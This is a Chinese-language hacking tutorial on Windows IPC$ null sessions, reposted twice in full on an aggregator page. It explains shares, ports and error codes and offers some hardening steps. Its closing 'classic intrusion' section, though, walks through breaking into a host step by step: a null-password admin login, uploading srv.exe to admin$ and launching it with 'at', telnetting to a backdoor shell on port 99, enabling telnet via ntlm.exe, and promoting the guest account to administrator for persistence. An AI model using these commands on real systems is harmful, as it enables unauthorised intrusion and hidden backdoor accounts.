黑客攻防35?對于第一次接觸ipc$的菜鳥來說,簡單的羅列步驟并不能解答他們的許多迷惑(你随便找一個hack論壇搜一下ipc,看存在的疑惑有多少).因此我寫了這篇相當于解惑的教程.想把一些容易混淆,容易迷惑人的問題說清楚,讓大家不要總徘徊在原地!如果你看完這篇帖子仍有疑問,請馬上回複!二 什麼是ipc$IPC$(Internet Process Connection)是共享"命名管道"的資源(大家都是這麼說的)，它是為了讓進程間通信而開放的命名管道，可以通過驗證用戶名和密碼獲得相應的權限,在遠程管理計算機和查看計算機的共享資源時使用利用IPC$,連接者甚至可以與目标主機建立一個空的連接而無需用戶名與密碼(當然,對方機器必須開了ipc$共享,否則你是連接不上的)，而利用這個空的連接，連接者還可以得到目标主機上的用戶列表(不過負責的管理員會禁止導出用戶列表的)我們總在說ipc$漏洞ipc$漏洞,其實,ipc$并不是真正意義上的漏洞,它是為了方便管理員的遠程管理而開放的遠程網絡登陸功能,而且還打開了默認共享,即所有的邏輯盤(c$,d$,e$……)和系統目錄WINNT或windows(admin$)所有的這些,初衷都是為了方便管理員的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什麼用心?我也不知道,代詞一個)會利用IPC$，訪問共享資源,導出用戶列表,并使用一些字典工具，進行密碼探測,寄希望于獲得更高的權限,從而達到不可告人的目的.解惑:1)IPC連接是Windows NT及以上系統中特有的遠程網絡登陸功能，其功能相當于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函數，所以不能在Windows 9.x中運行也就是說隻有nt/2000/xp才可以建立ipc$連接,98/me是不能建立ipc$連接的(但有些朋友說在98下能建立空的連接,不知道是真是假,不過現在都2003年了,建議98的同志換一下系統吧,98不爽的)2)即使是空連接也不是100%都能建立成功,如果對方關閉了ipc$共享,你仍然無法建立連接3)并不是說建立了ipc$連接就可以查看對方的用戶列表,因為管理員可以禁止導出用戶列表三 建立ipc$連接在hack攻擊中的作用就像上面所說的,即使你建立了一個空的連接,你也可以獲得不少的信息(而這些信息往往是**中必不可少的),訪問部分共享,如果你能夠以某一個具有一定權限的用戶身份登陸的話,那麼你就會得到相應的權限,顯然,如果你以管理員身份登陸,嘿嘿,就不用我在多說了吧,what u want,u can do!!(基本上可以總結為獲取目标信息、管理目标進程和服務,上傳木馬并運行,如果是2000server，還可以考慮開啟終端服務方便控制.怎麼樣?夠厲害吧!)不過你也不要高興的太早,因為管理員的密碼不是那麼好搞到的,雖然會有一些傻傻的管理員用空口令或者弱智密碼,但這畢竟是少數,而且現在不比從前了,随着人們安全意識的提高,管理員們也愈加小心了,得到管理員密碼會越來越難的因此今後你最大的可能就是以極小的權限甚至是沒有權限進行連接,你會慢慢的發現ipc$連接并不是萬能的,甚至在主機不開啟ipc$共享時,你根本就無法連接.所以我認為,你不要把ipc$**當作終極武器,不要認為它戰無不勝,它就像是足球場上射門前的傳球,很少會有緻命一擊的效果,但卻是不可缺少的,我覺得這才是ipc$連接在hack**中的意義所在.四 ipc$與空連接,139,445端口,默認共享的關系以上四者的關系可能是菜鳥很困惑的一個問題,不過大部分文章都沒有進行特别的說明,其實我理解的也不是很透徹,都是在與大家交流中總結出來的.(一個有良好讨論氛圍的BBS可以說是菜鳥的天堂)1)ipc$與空連接:不需要用戶名與密碼的ipc$連接即為空連接,一旦你以某個用戶或管理員的身份登陸(即以特定的用戶名和密碼進行ipc$連接),自然就不能叫做空連接了.許多人可能要問了,既然可以空連接,那我以後就空連接好了,為什麼還要費九牛二虎之力去掃描弱口令,呵呵,原因前面提到過,當你以空連接登陸時,你沒有任何權限(很郁悶吧),而你以用戶或管理員的身份登陸時,你就會有相應的權限(有權限誰不想呀,所以還是老老實實掃吧,不要偷懶喲).2)ipc$與139,445端口:ipc$連接可以實現遠程登陸及對默認共享的訪問;而139端口的開啟表示netbios協議的應用,我們可以通過139,445(win2000)端口實現對共享文件/打印機的訪問,因此一般來講,ipc$連接是需要139或445端口來支持的.3)ipc$與默認共享默認共享是為了方便管理員遠程管理而默認開啟的共享(你當然可以關閉它),即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$),我們通過ipc$連接可以實現對這些默認共享的訪問(前提是對方沒有關閉這些默認共享)五 ipc$連接失敗的原因以下5個原因是比較常見的:1)你的系統不是NT或以上操作系統;2)對方沒有打開ipc$默認共享3)對方未開啟139或445端口(惑被防火牆屏蔽)4)你的命令輸入有誤(比如缺少了空格等)5)用戶名或密碼錯誤(空連接當然無所謂了)另外,你也可以根據返回的錯誤号分析原因：錯誤号5，拒絕訪問 ： 很可能你使用的用戶不是管理員權限的，先提升權限；錯誤号51，Windows 無法找到網絡路徑 : 網絡有問題；錯誤号53，找不到網絡路徑 ： ip地址錯誤；目标未開機；目标lanmanserver服務未啟動；目标有防火牆（端口過濾）；錯誤号67，找不到網絡名 ： 你的lanmanworkstation服務未啟動；目标删除了ipc$；錯誤号1219，提供的憑據與已存在的憑據集沖突 ： 你已經和對方建立了一個ipc$，請删除再連錯誤号1326，未知的用戶名或錯誤密碼 ： 原因很明顯了；錯誤号1792，試圖登錄，但是網絡登錄服務沒有啟動 ： 目标NetLogon服務未啟動（連接域控會出現此情況）錯誤号2242，此用戶的密碼已經過期 ： 目标有帳号策略，強制定期要求更改密碼關于ipc$連不上的問題比較複雜，除了以上的原因,還會有其他一些不确定因素,在此本人無法詳細而确定的說明,就靠大家自己體會和試驗了.六 如何打開目标的IPC$(此段引自相關文章)首先你需要獲得一個不依賴于ipc$的shell，比如sql的cmd擴展、telnet、木馬,當然，這shell必須是admin權限的,然後你可以使用shell執行命令 net share ipc$ 來開放目标的ipc$從上面可以知道，ipc$能否使用還有很多條件請确認相關服務都已運行，沒有就啟動它（不知道怎麼做的請看net命令的用法）,還是不行的話（比如有防火牆，殺不了）建議放棄七 如何防範ipc$**1禁止空連接進行枚舉(此操作并不能阻止空連接的建立,引自《解剖win2000下的空會話》)首先運行regedit，找到如下組建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為：00000001(如果設置為2的話,有一些問題會發生,比如一些WIN的服務出現問題等等)2禁止默認共享1）察看本地共享資源運行-cmd-輸入net share2）删除共享(每次輸入一個）net share ipc$ /deletenet share admin$ /deletenet share c$ /deletenet share d$ /delete（如果有e,f,……可以繼續删除）3）停止server服務net stop server /y （重新啟動後server服務會重新開啟）4）修改注冊表運行-regeditserver版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的鍵值改為:00000000pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的鍵值改為:00000000如果上面所說的主鍵不存在，就新建(右擊-新建-雙字節值）一個主健再改鍵值3永久關閉ipc$和默認共享依賴的服務:lanmanserver即server服務控制面闆-管理工具-服務-找到server服務（右擊）-屬性-常規-啟動類型-已禁用4安裝防火牆(選中相關設置)，或者端口過濾(濾掉139,445等),或者用新版本的優化大師5設置複雜密碼，防止通過ipc$窮舉密碼八 相關命令1)建立空連接:net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)2)建立非空連接:net use \\IP\ipc$ "用戶名" /user:"密碼" (同樣有3個空格)3)映射默認共享:net use z: \\IP\c$ "密碼" /user:"用戶名" (即可将對方的c盤映射為自己的z盤，其他盤類推)如果已經和目标建立了ipc$，則可以直接用IP 盤符 $訪問,具體命令 net use z: \\IP\c$4)删除一個ipc$連接net use \\IP\ipc$ /del5)删除共享映射net use c: /del 删除映射的c盤，其他盤類推net use * /del 删除全部,會有提示要求按y确認九 經典**模式這個**模式太經典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創作者!(不知道是哪位前輩)1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"這是用《流光》掃到的用戶名是administrators，密碼為"空"的IP地址(空口令?哇,運氣好到家了)，如果是打算攻擊的話，就可以用這樣的命令來與127.0.0.1建立一個連接，因為密碼為"空"，所以第一個引号處就不用輸入，後面一個雙引号裡的是用戶名，輸入administrators，命令即可成功完成　　2. C:\>copy srv.exe \\127.0.0.1\admin$先複制srv.exe上去，在流光的Tools目錄下就有（這裡的$是指admin用戶的c:\winnt\system32\，大家還可以使用c$、d$，意思是C盤與D盤，這看你要複制到什麼地方去了）　　3. C:\>net time \\127.0.0.1查查時間，發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00，命令成功完成　　4. C:\>at \\127.0.0.1 11:05 srv.exe用at命令啟動srv.exe吧（這裡設置的時間要比主機時間快，不然你怎麼啟動啊，呵呵）　　5. C:\>net time \\127.0.0.1再查查到時間沒有？如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05，那就準備開始下面的命令　　6. C:\>telnet 127.0.0.1 99這裡會用到Telnet命令吧，注意端口是99Telnet默認的是23端口，但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活所以我們打算建立一個Telnet服務這就要用到ntlm了　　7.C:\>copy ntlm.exe \\127.0.0.1\admin$用Copy命令把ntlm.exe上傳到主機上（ntlm.exe也是在《流光》的Tools目錄中）　　8. C:\WINNT\system32>ntlm輸入ntlm啟動（這裡的C:\WINNT\system32>指的是對方計算機，運行ntlm其實是讓這個程序在對方計算機上運行）當出現"DONE"的時候，就說明已經啟動正常然後使用"net start telnet"來開啟Telnet服務9. Telnet 127.0.0.1，接着輸入用戶名與密碼就進入對方了，操作就像在DOS上操作一樣簡單(然後你想做什麼?想做什麼就做什麼吧,哈哈)為了以防萬一,我們再把guest激活加到管理組10. C:\>net user guest /active:yes将對方的Guest用戶激活11. C:\>net user guest 1234将Guest的密碼改為1234,或者你要設定的密碼12. C:\>net localgroup administrators guest /add将Guest變為Administrator^_^(如果管理員密碼更改，guest帳号沒改變的話，下次我們可以用guest再次訪問這台計算機)，接下來我們就來聊聊關于黑客攻防35?以下内容大家不妨參考一二希望能幫到您!

黑客攻防35

對于第一次接觸ipc$的菜鳥來說,簡單的羅列步驟并不能解答他們的許多迷惑(你随便找一個hack論壇搜一下ipc,看存在的疑惑有多少).因此我寫了這篇相當于解惑的教程.想把一些容易混淆,容易迷惑人的問題說清楚,讓大家不要總徘徊在原地!如果你看完這篇帖子仍有疑問,請馬上回複!二 什麼是ipc$IPC$(Internet Process Connection)是共享"命名管道"的資源(大家都是這麼說的)，它是為了讓進程間通信而開放的命名管道，可以通過驗證用戶名和密碼獲得相應的權限,在遠程管理計算機和查看計算機的共享資源時使用。利用IPC$,連接者甚至可以與目标主機建立一個空的連接而無需用戶名與密碼(當然,對方機器必須開了ipc$共享,否則你是連接不上的)，而利用這個空的連接，連接者還可以得到目标主機上的用戶列表(不過負責的管理員會禁止導出用戶列表的)。我們總在說ipc$漏洞ipc$漏洞,其實,ipc$并不是真正意義上的漏洞,它是為了方便管理員的遠程管理而開放的遠程網絡登陸功能,而且還打開了默認共享,即所有的邏輯盤(c$,d$,e$……)和系統目錄WINNT或windows(admin$)。所有的這些,初衷都是為了方便管理員的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什麼用心?我也不知道,代詞一個)會利用IPC$，訪問共享資源,導出用戶列表,并使用一些字典工具，進行密碼探測,寄希望于獲得更高的權限,從而達到不可告人的目的.解惑:1)IPC連接是Windows NT及以上系統中特有的遠程網絡登陸功能，其功能相當于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函數，所以不能在Windows 9.x中運行。也就是說隻有nt/2000/xp才可以建立ipc$連接,98/me是不能建立ipc$連接的(但有些朋友說在98下能建立空的連接,不知道是真是假,不過現在都2003年了,建議98的同志換一下系統吧,98不爽的)2)即使是空連接也不是100%都能建立成功,如果對方關閉了ipc$共享,你仍然無法建立連接3)并不是說建立了ipc$連接就可以查看對方的用戶列表,因為管理員可以禁止導出用戶列表三 建立ipc$連接在hack攻擊中的作用就像上面所說的,即使你建立了一個空的連接,你也可以獲得不少的信息(而這些信息往往是**中必不可少的),訪問部分共享,如果你能夠以某一個具有一定權限的用戶身份登陸的話,那麼你就會得到相應的權限,顯然,如果你以管理員身份登陸,嘿嘿,就不用我在多說了吧,what u want,u can do!!(基本上可以總結為獲取目标信息、管理目标進程和服務,上傳木馬并運行,如果是2000server，還可以考慮開啟終端服務方便控制.怎麼樣?夠厲害吧!)不過你也不要高興的太早,因為管理員的密碼不是那麼好搞到的,雖然會有一些傻傻的管理員用空口令或者弱智密碼,但這畢竟是少數,而且現在不比從前了,随着人們安全意識的提高,管理員們也愈加小心了,得到管理員密碼會越來越難的因此今後你最大的可能就是以極小的權限甚至是沒有權限進行連接,你會慢慢的發現ipc$連接并不是萬能的,甚至在主機不開啟ipc$共享時,你根本就無法連接.所以我認為,你不要把ipc$**當作終極武器,不要認為它戰無不勝,它就像是足球場上射門前的傳球,很少會有緻命一擊的效果,但卻是不可缺少的,我覺得這才是ipc$連接在hack**中的意義所在.四 ipc$與空連接,139,445端口,默認共享的關系以上四者的關系可能是菜鳥很困惑的一個問題,不過大部分文章都沒有進行特别的說明,其實我理解的也不是很透徹,都是在與大家交流中總結出來的.(一個有良好讨論氛圍的BBS可以說是菜鳥的天堂)1)ipc$與空連接:不需要用戶名與密碼的ipc$連接即為空連接,一旦你以某個用戶或管理員的身份登陸(即以特定的用戶名和密碼進行ipc$連接),自然就不能叫做空連接了.許多人可能要問了,既然可以空連接,那我以後就空連接好了,為什麼還要費九牛二虎之力去掃描弱口令,呵呵,原因前面提到過,當你以空連接登陸時,你沒有任何權限(很郁悶吧),而你以用戶或管理員的身份登陸時,你就會有相應的權限(有權限誰不想呀,所以還是老老實實掃吧,不要偷懶喲).2)ipc$與139,445端口:ipc$連接可以實現遠程登陸及對默認共享的訪問;而139端口的開啟表示netbios協議的應用,我們可以通過139,445(win2000)端口實現對共享文件/打印機的訪問,因此一般來講,ipc$連接是需要139或445端口來支持的.3)ipc$與默認共享默認共享是為了方便管理員遠程管理而默認開啟的共享(你當然可以關閉它),即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$),我們通過ipc$連接可以實現對這些默認共享的訪問(前提是對方沒有關閉這些默認共享)五 ipc$連接失敗的原因以下5個原因是比較常見的:1)你的系統不是NT或以上操作系統;2)對方沒有打開ipc$默認共享3)對方未開啟139或445端口(惑被防火牆屏蔽)4)你的命令輸入有誤(比如缺少了空格等)5)用戶名或密碼錯誤(空連接當然無所謂了)另外,你也可以根據返回的錯誤号分析原因：錯誤号5，拒絕訪問 ： 很可能你使用的用戶不是管理員權限的，先提升權限；錯誤号51，Windows 無法找到網絡路徑 : 網絡有問題；錯誤号53，找不到網絡路徑 ： ip地址錯誤；目标未開機；目标lanmanserver服務未啟動；目标有防火牆（端口過濾）；錯誤号67，找不到網絡名 ： 你的lanmanworkstation服務未啟動；目标删除了ipc$；錯誤号1219，提供的憑據與已存在的憑據集沖突 ： 你已經和對方建立了一個ipc$，請删除再連。錯誤号1326，未知的用戶名或錯誤密碼 ： 原因很明顯了；錯誤号1792，試圖登錄，但是網絡登錄服務沒有啟動 ： 目标NetLogon服務未啟動。（連接域控會出現此情況）錯誤号2242，此用戶的密碼已經過期 ： 目标有帳号策略，強制定期要求更改密碼。關于ipc$連不上的問題比較複雜，除了以上的原因,還會有其他一些不确定因素,在此本人無法詳細而确定的說明,就靠大家自己體會和試驗了.六 如何打開目标的IPC$(此段引自相關文章)首先你需要獲得一個不依賴于ipc$的shell，比如sql的cmd擴展、telnet、木馬,當然，這shell必須是admin權限的,然後你可以使用shell執行命令 net share ipc$ 來開放目标的ipc$。從上面可以知道，ipc$能否使用還有很多條件。請确認相關服務都已運行，沒有就啟動它（不知道怎麼做的請看net命令的用法）,還是不行的話（比如有防火牆，殺不了）建議放棄。七 如何防範ipc$**1禁止空連接進行枚舉(此操作并不能阻止空連接的建立,引自《解剖win2000下的空會話》)首先運行regedit，找到如下組建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為：00000001(如果設置為2的話,有一些問題會發生,比如一些WIN的服務出現問題等等)2禁止默認共享1）察看本地共享資源運行-cmd-輸入net share2）删除共享(每次輸入一個）net share ipc$ /deletenet share admin$ /deletenet share c$ /deletenet share d$ /delete（如果有e,f,……可以繼續删除）3）停止server服務net stop server /y （重新啟動後server服務會重新開啟）4）修改注冊表運行-regeditserver版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的鍵值改為:00000000。pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的鍵值改為:00000000。如果上面所說的主鍵不存在，就新建(右擊-新建-雙字節值）一個主健再改鍵值。3永久關閉ipc$和默認共享依賴的服務:lanmanserver即server服務控制面闆-管理工具-服務-找到server服務（右擊）-屬性-常規-啟動類型-已禁用4安裝防火牆(選中相關設置)，或者端口過濾(濾掉139,445等),或者用新版本的優化大師5設置複雜密碼，防止通過ipc$窮舉密碼八 相關命令1)建立空連接:net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)2)建立非空連接:net use \\IP\ipc$ "用戶名" /user:"密碼" (同樣有3個空格)3)映射默認共享:net use z: \\IP\c$ "密碼" /user:"用戶名" (即可将對方的c盤映射為自己的z盤，其他盤類推)如果已經和目标建立了ipc$，則可以直接用IP 盤符 $訪問,具體命令 net use z: \\IP\c$4)删除一個ipc$連接net use \\IP\ipc$ /del5)删除共享映射net use c: /del 删除映射的c盤，其他盤類推net use * /del 删除全部,會有提示要求按y确認九 經典**模式這個**模式太經典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創作者!(不知道是哪位前輩)1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"這是用《流光》掃到的用戶名是administrators，密碼為"空"的IP地址(空口令?哇,運氣好到家了)，如果是打算攻擊的話，就可以用這樣的命令來與127.0.0.1建立一個連接，因為密碼為"空"，所以第一個引号處就不用輸入，後面一個雙引号裡的是用戶名，輸入administrators，命令即可成功完成。　　2. C:\>copy srv.exe \\127.0.0.1\admin$先複制srv.exe上去，在流光的Tools目錄下就有（這裡的$是指admin用戶的c:\winnt\system32\，大家還可以使用c$、d$，意思是C盤與D盤，這看你要複制到什麼地方去了）。　　3. C:\>net time \\127.0.0.1查查時間，發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00，命令成功完成。　　4. C:\>at \\127.0.0.1 11:05 srv.exe用at命令啟動srv.exe吧（這裡設置的時間要比主機時間快，不然你怎麼啟動啊，呵呵！）　　5. C:\>net time \\127.0.0.1再查查到時間沒有？如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05，那就準備開始下面的命令。　　6. C:\>telnet 127.0.0.1 99這裡會用到Telnet命令吧，注意端口是99。Telnet默認的是23端口，但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell。雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活！所以我們打算建立一個Telnet服務！這就要用到ntlm了　　7.C:\>copy ntlm.exe \\127.0.0.1\admin$用Copy命令把ntlm.exe上傳到主機上（ntlm.exe也是在《流光》的Tools目錄中）。　　8. C:\WINNT\system32>ntlm輸入ntlm啟動（這裡的C:\WINNT\system32>指的是對方計算機，運行ntlm其實是讓這個程序在對方計算機上運行）。當出現"DONE"的時候，就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務！9. Telnet 127.0.0.1，接着輸入用戶名與密碼就進入對方了，操作就像在DOS上操作一樣簡單！(然後你想做什麼?想做什麼就做什麼吧,哈哈)為了以防萬一,我們再把guest激活加到管理組10. C:\>net user guest /active:yes将對方的Guest用戶激活11. C:\>net user guest 1234将Guest的密碼改為1234,或者你要設定的密碼12. C:\>net localgroup administrators guest /add将Guest變為Administrator^_^(如果管理員密碼更改，guest帳号沒改變的話，下次我們可以用guest再次訪問這台計算機)

更多精彩资讯请关注tft每日頭條，我们将持续为您更新最新资讯!